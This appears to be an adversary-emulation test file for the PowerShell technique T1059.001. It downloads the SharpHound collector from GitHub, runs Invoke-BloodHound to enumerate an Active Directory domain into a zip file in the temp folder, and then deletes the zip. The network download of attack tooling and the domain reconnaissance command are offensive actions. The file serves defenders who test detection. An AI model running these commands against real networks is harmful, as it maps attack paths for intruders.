#TechniqueName: Command and Scripting Interpreter: PowerShell
#AtomicTestName: Run BloodHound from local disk
#Description: Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.&&Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.&
#Language: ps1

#get_prereq_commands
Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\T1059.001\src\SharpHound.ps1"


#commands
write-host "Import and Execution of SharpHound.ps1 from PathToAtomicsFolder\T1059.001\src" -ForegroundColor Cyan
import-module PathToAtomicsFolder\T1059.001\src\SharpHound.ps1
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5


#cleanup_commands
Remove-Item $env:Temp\*BloodHound.zip -Force

